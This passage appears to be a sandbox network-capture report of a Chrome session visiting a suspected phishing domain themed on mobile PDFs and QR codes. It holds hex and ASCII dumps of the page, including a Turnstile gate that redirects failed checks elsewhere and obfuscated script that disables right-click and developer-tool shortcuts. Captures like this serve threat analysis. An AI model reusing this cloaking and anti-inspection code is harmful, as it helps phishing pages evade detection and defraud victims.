                                                                                                                                                2024-10-28 16:47:55 UTC6146OUTData Raw: 35 37 61 66 65 65 63 66 64 61 35 62 35 35 36 61 38 35 62 63 32 30 37 36 62 39 38 39 63 64 37 61 36 34 64 38 65 39 64 39 66 66 62 65 35 33 35 32 32 64 30 65 37 36 35 33 61 30 30 35 34 63 39 39 3d 41 4e 75 30 4b 56 62 6c 6e 71 65 31 59 47 45 4a 6f 70 33 35 59 70 36 38 78 54 59 69 58 51 77 78 67 55 48 71 37 41 76 5a 59 75 67 2d 31 37 33 30 31 33 34 30 35 32 2d 31 2e 32 2e 31 2e 31 2d 64 70 38 66 31 6d 45 41 54 36 4f 32 43 6b 65 61 58 66 52 41 53 73 67 35 54 54 6f 41 59 68 61 54 57 34 4d 4e 72 30 66 50 34 35 6b 54 77 31 33 63 32 41 38 72 41 4f 44 57 65 33 66 79 55 53 66 74 6e 46 57 33 55 41 50 73 4f 67 69 39 59 56 68 34 5a 70 69 75 6c 47 4c 4f 66 31 2e 6c 6a 4b 7a 65 4f 61 48 53 4f 73 7a 51 4a 4d 63 38 51 76 66 56 77 62 42 6c 44 41 50 67 57 4d 33 44 49 39 77
                                                                                                                                                Data Ascii: 57afeecfda5b556a85bc2076b989cd7a64d8e9d9ffbe53522d0e7653a0054c99=ANu0KVblnqe1YGEJop35Yp68xTYiXQwxgUHq7AvZYug-1730134052-1.2.1.1-dp8f1mEAT6O2CkeaXfRASsg5TToAYhaTW4MNr0fP45kTw13c2A8rAODWe3fyUSftnFW3UAPsOgi9YVh4ZpiulGLOf1.ljKzeOaHSOszQJMc8QvfVwbBlDAPgWM3DI9w
                                                                                                                                                2024-10-28 16:47:56 UTC1342INHTTP/1.1 200 OK
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:55 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: close
                                                                                                                                                Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=.mobile-pdfqronline.com; Priority=High; HttpOnly; Secure; SameSite=None
                                                                                                                                                Set-Cookie: cf_clearance=GXTU_AlEyEpUgwMeZAUBnN7xIYtdlnJpuO0O_9o7hk4-1730134052-1.2.1.1-TBrIWbXyEjj2XeUeoswfMlD0e1W_s6qPigj1kSjczjNSs2HbeBN3yG3i4AmbnkopCXsj5O92xoEayKP1dSuJGaEjUp48YU412dG4geD1FZC3mPWtmR7IKXcYuw8Mr_OaytWWKPofIOVMURBzGYrTGotXar2iBz7ly4jsjmeD0.LUF8sk08huhK5MsmpLKC4Dl5oZXkeo0f8MeDg0eTnDkQXVFNeUBUT7BYY8QTA0C9PZI0zmgdGQQV91Qb5WeTekNJFasK2uTIKxTBZ7nIRjjvVRvCL7mvltG5r5qVSz3rqY4o51U451N04JfKRItSkDxqLH30p__3xKo3YsxfULJP7Vs9tAfc0ud7VRJOb8pUOoUqm4A0lQ2WPdI94jQdu07D5QfU8KNGRG1ZG.5W_Ctb1M6padlQtA0WUbAePn8N2AZ_glNF5j89O1knOz.ax8; Path=/; Expires=Tue, 28-Oct-25 16:47:55 GMT; Domain=.mobile-pdfqronline.com; Priority=High; HttpOnly; Secure; SameSite=None; Partitioned
                                                                                                                                                Last-Modified: Mon, 28 Oct 2024 10:57:45 GMT
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dKl9aCl%2FSkgF%2FN25ePb1xCna3q7H99Ks92%2FGL65hfERtBAgm22Bdcs5D1niJ0Xqv%2FPb%2FTAL4uCdGDaEI9H5Eo8Qxc7asvoq1aiWWP6yWF4b036O72UBV3HKpCnFVc0beG93S%2FmOXFU%2FdmLlgvN2vakxtHLgqLJk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                2024-10-28 16:47:56 UTC339INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 64 39 63 36 39 31 35 63 39 61 33 32 65 37 31 2d 44 46 57 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 32 32 38 32 26 73 65 6e 74 3d 37 26 72 65 63 76 3d 31 33 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 35 38 26 72 65 63 76 5f 62 79 74 65 73 3d 38 30 36
                                                                                                                                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d9c6915c9a32e71-DFWalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2282&sent=7&recv=13&lost=0&retrans=0&sent_bytes=2858&recv_bytes=806
                                                                                                                                                2024-10-28 16:47:56 UTC1369INData Raw: 31 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 6a 71 75 65 72 79 2d 33 2e 36 2e 30 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75
                                                                                                                                                Data Ascii: 1dfc<!DOCTYPE html><html lang="en" dir="ltr" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" class="responsive"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/tu
                                                                                                                                                2024-10-28 16:47:56 UTC1369INData Raw: 35 72 65 6d 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 7d 2e 63 6f 72 65 2d 6d 73 67 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 62 6f 64 79 2d 74 65 78 74 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 72 65 6d 3b 66 6f 6e 74
                                                                                                                                                Data Ascii: 5rem}.main-wrapper{display:flex;flex:1;flex-direction:column;align-items:center}.spacer{margin:2rem 0}.h1{line-height:3.75rem;font-size:2.5rem}.core-msg,.h2{line-height:2.25rem;font-size:1.5rem}.core-msg{font-weight:400}.body-text{line-height:1.25rem;font
                                                                                                                                                2024-10-28 16:47:56 UTC1369INData Raw: 75 72 6e 73 74 69 6c 65 27 2c 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 69 74 65 6b 65 79 3a 20 27 30 78 34 41 41 41 41 41 41 41 6a 47 64 37 77 59 2d 30 77 35 57 66 55 5a 27 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 65 72 72 6f 72 2d 63 61 6c 6c 62 61 63 6b 27 3a 20 72 65 64 69 72 65 63 74 54 6f 52 61 6e 64 6f 6d 53 69 74 65 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 6c 6c 62 61 63 6b 3a 20 6f 6e 56 65 72 69 66 69 63 61 74 69 6f 6e 53 75 63 63 65 73 73 2c 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 72 65 64 69 72 65 63 74 54 6f 52 61 6e 64 6f 6d 53 69 74 65 28 29 20 7b 0d 0a 20 20 20 20 20 20 20
                                                                                                                                                Data Ascii: urnstile', { sitekey: '0x4AAAAAAAjGd7wY-0w5WfUZ', 'error-callback': redirectToRandomSite, callback: onVerificationSuccess, }); } function redirectToRandomSite() {
                                                                                                                                                2024-10-28 16:47:56 UTC1369INData Raw: 30 78 38 64 32 66 32 31 5d 3b 72 65 74 75 72 6e 20 5f 30 78 32 34 61 33 33 30 3b 7d 2c 5f 30 78 38 64 32 66 28 5f 30 78 32 35 33 37 61 31 2c 5f 30 78 33 30 36 37 62 61 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 35 33 66 28 29 7b 76 61 72 20 5f 30 78 33 38 62 35 39 32 3d 5b 27 31 31 31 33 36 35 30 58 6d 53 4a 70 62 27 2c 27 35 39 39 35 34 38 36 6c 73 56 66 65 41 27 2c 27 31 38 71 7a 68 74 4f 4b 27 2c 27 63 6f 6e 74 65 78 74 6d 65 6e 75 27 2c 27 31 36 36 4b 76 66 51 64 4b 27 2c 27 32 30 31 31 39 6a 6a 4b 73 79 6c 27 2c 27 6b 65 79 64 6f 77 6e 27 2c 27 33 35 35 39 57 48 51 72 48 5a 27 2c 27 6b 65 79 43 6f 64 65 27 2c 27 33 33 31 31 35 35 32 46 75 7a 62 6f 6d 27 2c 27 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2c 27 6f 6e 6b 65 79 64 6f 77 6e 27
                                                                                                                                                Data Ascii: 0x8d2f21];return _0x24a330;},_0x8d2f(_0x2537a1,_0x3067ba);}function _0x153f(){var _0x38b592=['1113650XmSJpb','5995486lsVfeA','18qzhtOK','contextmenu','166KvfQdK','20119jjKsyl','keydown','3559WHQrHZ','keyCode','3311552Fuzbom','addEventListener','onkeydown'
                                                                                                                                                2024-10-28 16:47:56 UTC1369INData Raw: 32 28 30 78 63 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 34 65 36 32 36 29 7b 76 61 72 20 5f 30 78 32 65 63 30 36 61 3d 5f 30 78 34 38 33 61 30 32 3b 69 66 28 65 76 65 6e 74 5b 27 6b 65 79 43 6f 64 65 27 5d 3d 3d 30 78 37 62 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 27 63 74 72 6c 4b 65 79 27 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 31 29 5d 3d 3d 27 45 27 5b 27 63 68 61 72 43 6f 64 65 41 74 27 5d 28 30 78 30 29 29 72 65 74 75 72 6e 21 5b 5d 3b 69 66 28 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 36 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 5f 30 78 32 65 63 30 36 61 28 30 78 63 39 29 5d 26 26 5f 30 78 35 34 65 36 32 36 5b 27 6b 65 79 43 6f 64 65 27 5d 3d
                                                                                                                                                Data Ascii: 2(0xc4)]=function(_0x54e626){var _0x2ec06a=_0x483a02;if(event['keyCode']==0x7b)return![];if(_0x54e626['ctrlKey']&&_0x54e626[_0x2ec06a(0xc1)]=='E'['charCodeAt'](0x0))return![];if(_0x54e626[_0x2ec06a(0xc6)]&&_0x54e626[_0x2ec06a(0xc9)]&&_0x54e626['keyCode']=
                                                                                                                                                2024-10-28 16:47:56 UTC839INData Raw: 6d 65 2d 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 2d 31 37 70 78 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 73 69 74 65 2d 6e 61 6d 65 22 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 2e 2e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 3c 70 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 70 6c 65 61 73 65 5f 77 61 69 74 22 20 69 64 3d 22 63 66 2d 73 70 69 6e 6e 65 72 2d 70 6c 65 61 73 65 2d 77 61 69 74 22 3e 20 50 6c 65 61 73 65 20 73 74 61 6e 64 20 62 79 2c 20 77 68 69 6c 65 20 77
                                                                                                                                                Data Ascii: me-title"> <div> <img src="" style="margin-bottom:-17px"> <div id="site-name">Just a moment.....</div> </div> </h1> <p data-translate="please_wait" id="cf-spinner-please-wait"> Please stand by, while w
                                                                                                                                                2024-10-28 16:47:56 UTC7INData Raw: 32 0d 0a 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 2
                                                                                                                                                2024-10-28 16:47:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                Data Ascii: 0


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                33192.168.2.1649763104.18.94.414436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:56 UTC580OUTGET /turnstile/v0/api.js?render=explicit HTTP/1.1
                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:56 UTC386INHTTP/1.1 302 Found
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:56 GMT
                                                                                                                                                Content-Length: 0
                                                                                                                                                Connection: close
                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public
                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                location: /turnstile/v0/b/e1a56f38220d/api.js
                                                                                                                                                Server: cloudflare
                                                                                                                                                CF-RAY: 8d9c691b9f246b41-DFW
                                                                                                                                                alt-svc: h3=":443"; ma=86400


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                34192.168.2.1649764151.101.66.1374436856C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                2024-10-28 16:47:56 UTC554OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                Host: code.jquery.com
                                                                                                                                                Connection: keep-alive
                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                Accept: */*
                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                Referer: https://vokbz-iamgold.mobile-pdfqronline.com/
                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                2024-10-28 16:47:56 UTC610INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 89501
                                                                                                                                                Server: nginx
                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                ETag: "28feccc0-15d9d"
                                                                                                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Mon, 28 Oct 2024 16:47:56 GMT
                                                                                                                                                Age: 1150938
                                                                                                                                                X-Served-By: cache-lga21931-LGA, cache-dfw-ktki8620065-DFW
                                                                                                                                                X-Cache: HIT, HIT
                                                                                                                                                X-Cache-Hits: 2, 2
                                                                                                                                                X-Timer: S1730134077.784410,VS0,VE0
                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                2024-10-28 16:47:56 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
